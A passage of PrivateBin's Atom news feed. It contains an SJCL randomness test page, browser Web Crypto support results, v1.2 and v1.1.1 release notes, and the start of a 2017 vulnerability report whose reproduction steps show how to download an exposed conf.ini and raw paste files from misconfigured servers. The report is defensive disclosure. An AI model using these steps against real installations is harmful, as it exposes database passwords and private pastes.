&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="kd"&gt;var&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;time&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;now&lt;/span&gt;&lt;span class="p"&gt;(),&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;addEventListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;progress&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;waiting ... &amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;addEventListener&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;seeded&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;((&lt;/span&gt;&lt;span class="nb"&gt;Date&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;now&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;time&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39; milliseconds&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="c1"&gt;// set the paranoia level explicitly:&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setDefaultParanoia&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;10&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;without startCollectors&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nx"&gt;setTimeout&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;startCollectors&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="c1"&gt;// start random number generator collector.&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;startCollectors&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;progress so far is &amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getProgress&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;100&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;
&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;%, isReady says: &amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;isReady&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;
&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;, 8 randomwords are: &amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;randomWords&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;8&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;},&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;progress so far is &amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getProgress&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mf"&gt;100&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;%, isReady says: &amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;isReady&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;
&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;, 8 randomwords are: &amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;sjcl&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;randomWords&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mf"&gt;8&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;script&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;head&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;h3&gt;Details on the tested browsers versions&lt;/h3&gt;
&lt;p&gt;The following screenshots were collected while running the above SJCL library test website to detect browsers that fall back on collecting entropy instead of the web crypto API for generating random numbers. In some cases we didn't have enough versions at our disposal to find the precise version and just documented the state of those available to us.&lt;/p&gt;
&lt;p&gt;The test website had to be offered via HTTP, since most of the affected older browsers don't support modern TLS 1.3 and certificate authorities and so would fail to connect using HTTPS.&lt;/p&gt;
&lt;h4&gt;Firefox&lt;/h4&gt;
&lt;p&gt;Version 21 (left) was the first to support the web crypto API, while the much older version 3 did not (right):&lt;/p&gt;
&lt;p&gt;&lt;img alt="SJCL test on Firefox version 21" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-firefox21.png"&gt; &lt;img alt="SJCL test on Firefox version 3" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-firefox3.png"&gt;&lt;/p&gt;
&lt;h4&gt;Chrome&lt;/h4&gt;
&lt;p&gt;The oldest version at our disposal was Chrome version 15 which already did support the web crypto API. No screenshots were collected.&lt;/p&gt;
&lt;h4&gt;Safari&lt;/h4&gt;
&lt;p&gt;Version 5 (left) did support the web crypto API, while version 4 did not (right):&lt;/p&gt;
&lt;p&gt;&lt;img alt="SJCL test on Safari version 5" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-safari5-macos.png"&gt; &lt;img alt="SJCL test on Safari version 4" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-safari4-windows.png"&gt;&lt;/p&gt;
&lt;h4&gt;Internet Explorer&lt;/h4&gt;
&lt;p&gt;Version 11 did support the web crypto API, while versions 8 and 10 did not (below):&lt;/p&gt;
&lt;p&gt;&lt;img alt="SJCL test on Internet Explorer version 10" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-internetexplorer10.png"&gt; &lt;img alt="SJCL test on Internet Explorer version 8" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-internetexplorer8.png"&gt;&lt;/p&gt;
&lt;h4&gt;Opera&lt;/h4&gt;
&lt;p&gt;Version 20 did support the web crypto API, while version 15 did not (version 11.6 below):&lt;/p&gt;
&lt;p&gt;&lt;img alt="SJCL test on Opera version 11.6" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-opera11.6.png"&gt;&lt;/p&gt;
&lt;h4&gt;Edge&lt;/h4&gt;
&lt;p&gt;All Edge versions support the web crypto API. No screenshots were collected.&lt;/p&gt;
&lt;h4&gt;Android&lt;/h4&gt;
&lt;p&gt;The oldest version at our disposal was Android 4.4 which already did support the web crypto API.&lt;/p&gt;
&lt;p&gt;&lt;img alt="SJCL test on Android version 4.4" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-android4.4.png"&gt;&lt;/p&gt;
&lt;h4&gt;iOS&lt;/h4&gt;
&lt;p&gt;Version 7 (left) did support the web crypto API, while version 4.3.2 did not (right):&lt;/p&gt;
&lt;p&gt;&lt;img alt="SJCL test on iPhone 5S, iOS version 7" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-iphone5s-ios7.png"&gt; &lt;img alt="SJCL test on iPad 2, iOS version 4.3.2" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-ipad2-ios4.3.2.png"&gt;&lt;/p&gt;
&lt;h4&gt;Windows Phone&lt;/h4&gt;
&lt;p&gt;The only version at our disposal was Windows Phone version 8.1 which did support the web crypto API (below):&lt;/p&gt;
&lt;p&gt;&lt;img alt="SJCL test on Windows Phone version 8.1" src="https://privatebin.info/img/vulnerability-2018-08-11/sjcl-test-windowsphone8.1.png"&gt;&lt;/p&gt;
&lt;h4&gt;Sailfish OS&lt;/h4&gt;
&lt;p&gt;All Nightly browser versions support the web crypto API. No screenshots were collected.&lt;/p&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/></entry><entry><title>Release v1.2 - QR codes, inline media display, 6 new languages &amp; JS refactoring</title><link href="https://privatebin.info/news/v1.2-release.html" rel="alternate"/><published>2018-07-22T11:21:00+02:00</published><updated>2018-07-22T11:21:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2018-07-22:/news/v1.2-release.html</id><summary type="html">&lt;p&gt;This release adds QR code generation, inline display of video, audio, PDF and new translations to PrivateBin and a large refactoring of the JavaScript code.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release adds QR code generation, inline display of video, audio, PDF and new translations to PrivateBin and a large refactoring of the JavaScript code.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A new button lets you generate a &lt;em&gt;QR code&lt;/em&gt; of your newly created pastes URL. This allows for easy transfer of a pasted data from one mobile device to another.&lt;/p&gt;
&lt;p&gt;When the optional file upload is enabled, uploaded &lt;em&gt;videos, audio files and PDFs&lt;/em&gt; are displayed inline, like we did with images, as long as the visitors browser supports it. By default the file and paste upload is limited to a 2 MiB size.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Translations&lt;/em&gt; for Spanish, Occitan, Norwegian, Portuguese, Dutch and Hungarian have also been added since the last release.&lt;/p&gt;
&lt;p&gt;The main change of this release, and the reason it took us so long since doing the last one, was the large &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/180"&gt;refactoring and cleanup of the JavaScript logic&lt;/a&gt; of PrivateBin. The refactoring itself was done in early 2017. In parallel we introced mocha and JSverify running on nodeJS as a &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/tst/README.md#property-based-unit-testing"&gt;property based unit testing&lt;/a&gt; framework for the logic (à la &lt;a href="https://www.youtube.com/watch?v=AfaNEebCDos"&gt;QuickCheck&lt;/a&gt;). Many months were spent to cover more and more pieces of the logic.&lt;/p&gt;
&lt;p&gt;In the end we covered all of the modular parts of the logic (879 of 1273 lines of code for a &lt;a href="https://privatebin.info/jscoverage/js/privatebin.js.html"&gt;69% code coverage&lt;/a&gt;), including the encryption wrapper functions for backward compatibility with older paste formats. The UI related parts of the code proved difficult to test, partly because in nodeJS the browsers document object model (DOM) is emulated using the JSdom library, the lack of an actual view port being present (so no scrolling, for example) and also due the event driven nature which contradicts the modular approach of unit testing. For many UI interfaces, large parts of the DOM has to be present, since emitting a single click event may trigger changes in many different parts of the UI. This is a shortcoming of the current structure of the UI logic, which we may need to improve further.&lt;/p&gt;
&lt;p&gt;Still, the unit testing &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/32#issuecomment-401545763"&gt;found many regressions&lt;/a&gt; and some issues that have been in the code for a long time without having been reported. It lays the necessary ground work for the future changes, especially the major changes planned for the encryption format.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;Apart from the new QR code feature many new translations were added. All used libraries were upgraded, too. While no security issues were reported for any of these, they address some bugs that didn't affect us directly or improve compatibility with the latests browsers and PHP releases.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;A new &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#name"&gt;configuration option &lt;code&gt;name&lt;/code&gt;&lt;/a&gt; was introduced for those admins that like to replace the "PrivateBin" moniker in the template with their own site name.&lt;/p&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We now also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root. We also started providing &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Docker"&gt;additional tools in Docker containers&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.1.1&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translations for Spanish, Occitan, Norwegian, Portuguese, Dutch and Hungarian&lt;/li&gt;
&lt;li&gt;ADDED: Option in configuration to change the default "PrivateBin" title of the site&lt;/li&gt;
&lt;li&gt;ADDED: Added display of video, audio &amp;amp; PDF, drag &amp;amp; drop, preview of attachments (#182)&lt;/li&gt;
&lt;li&gt;ADDED: QR code generation (#169)&lt;/li&gt;
&lt;li&gt;ADDED: Introduced DOMpurify library to sanitize generated HTML before display (#183)&lt;/li&gt;
&lt;li&gt;CHANGED: Force JSON request for getting paste data &amp;amp; password retry (#216)&lt;/li&gt;
&lt;li&gt;CHANGED: Minimum required PHP version is 5.4 (#186)&lt;/li&gt;
&lt;li&gt;CHANGED: Shipped .htaccess files were updated for Apache 2.4 (#192)&lt;/li&gt;
&lt;li&gt;CHANGED: Cleanup of bootstrap template variants and moved icons to &lt;code&gt;img&lt;/code&gt; directory&lt;/li&gt;
&lt;li&gt;CHANGED: Removed option to hide clone button on expiring pastes, since this requires reading the paste for rendering the template, which leaks information on the pastes state&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: SJCL 1.0.7, jQuery 3.3.1, Base64 2.4.5, Showdown 1.8.6, DOMpurify 1.0.5 &amp;amp; Prettify 453bd5f&lt;/li&gt;
&lt;li&gt;CHANGED: Refactored JavaScript code, making it modular with private and public functions, making it much easier to maintain (#178)&lt;/li&gt;
&lt;li&gt;FIXED: To counteract regressions introduced by the refactoring, we finally introduced property based unit testing for the JavaScript code, this caught several regressions, but also some very old bugs not found so far (#32)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Over the last months we often had issues to motivate ourselves to move on with the rather tedious refactoring and unit testing. As an open source project every contribution small or large is greatly appreciated. Especially all the new languages that got added show the core team that this project is used and how far it already got spread.&lt;/p&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;In the next major release we plan to &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/4"&gt;change the paste format&lt;/a&gt;. This includes introducing a new version identifier, support for different encryption schemes, ideally including the browsers internal cryptography instead of the JavaScript SJCL one, switch to a correct deflate compression implementation to ensure cross-language compatibility and generally review to paste format for improvements. Of course we will keep supporting both the original ZeroBin and current formats, so that upgrades remain possible without data loss. Thanks to the JavaScript unit testing introduced with this release, the backwards compatibility gets accounted for.&lt;/p&gt;
&lt;p&gt;We also already have quite a few &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt; flagged for the release after that. We want to concentrate on the paste format first, to be able build on top of it. But we would of course not say no to any earlier pull requests for any of these.&lt;/p&gt;
&lt;p&gt;All in all, with this tedious behind the scenes cleanup finally done, we now plan to return to a more frequent release cycle and wish you all,&lt;/p&gt;
&lt;p&gt;Good night, and good luck.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.1.1 - Fix for data leak vulnerability</title><link href="https://privatebin.info/news/v1.1.1-release.html" rel="alternate"/><published>2017-10-10T20:57:00+02:00</published><updated>2017-10-10T20:57:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2017-10-10:/news/v1.1.1-release.html</id><summary type="html">&lt;p&gt;This release addresses a data leak vulnerability in PrivateBin.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release fixes leakage of configuration and raw pastes that can occur in some setups.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;On 29th of September, &lt;a href="https://github.com/pstn"&gt;@pstn&lt;/a&gt; reported a medium data leak vulnerability in PrivateBin. If either a) a non-apache webserver is used or b) apache has "AllowOverride" disabled &lt;strong&gt;and&lt;/strong&gt; the installation was not secured by changing the path of sensitive folders, these can be accessed from the outside. This release fixes this by converting these files from INI/JSON to php files, so that they are protected even under those conditions.&lt;/p&gt;
&lt;p&gt;Further details on why this is an issue and its implications can be found in our &lt;a href="https://privatebin.info/reports/vulnerability-2017-09-29.html"&gt;report on the vulnerability&lt;/a&gt;. It also describes methods to check if your server is currently affected by the issue.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;Even if you are currently using an apache server and are not affected by this issue, we would advise to plan to update soon. Some of the sites affected by this reported that they had changed their webserver setup, inadvertedly becoming affected. You might do the same in the future, too, and forget to check your PrivateBin setups security.&lt;/p&gt;
&lt;p&gt;Alternatively consider to securing your installation by changing the path of folders containing sensitive information. We have updated our &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Installation#changing-the-path"&gt;installation instructions&lt;/a&gt;, stressing our security recommendations.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;Apart from updating the libraries and the javascript files, make sure that your PHP process can also write to the cfg folder. The next call to your privatebin installation will convert the &lt;code&gt;conf.ini&lt;/code&gt; file into &lt;code&gt;conf.php&lt;/code&gt;. Accessing pastes will convert these, too. Additionally we also are hooking into the purge mechanism to gradually convert pastes that are not frequently accessed.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.1&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CHANGED: Switched to &lt;code&gt;.php&lt;/code&gt; file extension for configuration and data files, to avoid leaking data in unprotected installations.&lt;/li&gt;
&lt;/ul&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Vulnerability Report</title><link href="https://privatebin.info/reports/vulnerability-2017-09-29.html" rel="alternate"/><published>2017-10-10T20:29:00+02:00</published><updated>2017-10-10T20:29:00+02:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2017-10-10:/reports/vulnerability-2017-09-29.html</id><summary type="html">&lt;p&gt;On 29th of September, &lt;a href="https://github.com/pstn"&gt;@pstn&lt;/a&gt; reported a medium data leak vulnerability in PrivateBin, which has been fixed in &lt;a href="https://privatebin.info/news/v1.1.1-release.html"&gt;PrivateBin v1.1.1&lt;/a&gt;.&lt;/p&gt;</summary><content type="html">&lt;p&gt;On 29th of September 2017, &lt;strong&gt;&lt;a href="https://github.com/pstn"&gt;@pstn&lt;/a&gt;&lt;/strong&gt; reported a medium data leak vulnerability in PrivateBin. Vulnerability write-up done by &lt;a href="https://github.com/rugk"&gt;@rugk&lt;/a&gt; and &lt;a href="https://github.com/elrido"&gt;@elrido&lt;/a&gt;.&lt;br&gt;
The vulnerability has been fixed in &lt;a href="https://privatebin.info/news/v1.1.1-release.html"&gt;PrivateBin v1.1.1&lt;/a&gt;. Admins are urged to check whether they are affected by this configuration issue.&lt;/p&gt;
&lt;h2&gt;Affected versions&lt;/h2&gt;
&lt;p&gt;Any ZeroBin and PrivateBin version before 1.1.1&lt;/p&gt;
&lt;h2&gt;Conditions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Another web server than Apache has to be used or an Apache server with "AllowOverride None" option set for the virtualhost PrivateBin is hosted under.&lt;/li&gt;
&lt;li&gt;The config and data directories are left in the websites document root path (&lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Installation#changing-the-path"&gt;contrary to the recommendation in the installation document&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Steps to reproduce configuration file leak&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Go to https://paste.exmaple.com/cfg/conf.ini.&lt;/li&gt;
&lt;li&gt;Download the file.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Steps to reproduce paste file leak&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;Go to https://paste.example.com/.&lt;/li&gt;
&lt;li&gt;Create a new paste as usual via the UI.&lt;/li&gt;
&lt;li&gt;Assuming the generated paste has been given the random ID fecba9876543210f, go to https://paste.example.com/data/fe/cb/fecba9876543210f.&lt;/li&gt;
&lt;li&gt;Download the file.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;In the circumstances described above, the config file of PrivateBin may have been leaked to third-parties. If a database is used, this includes the database passwords, which were set in the config file.&lt;/p&gt;
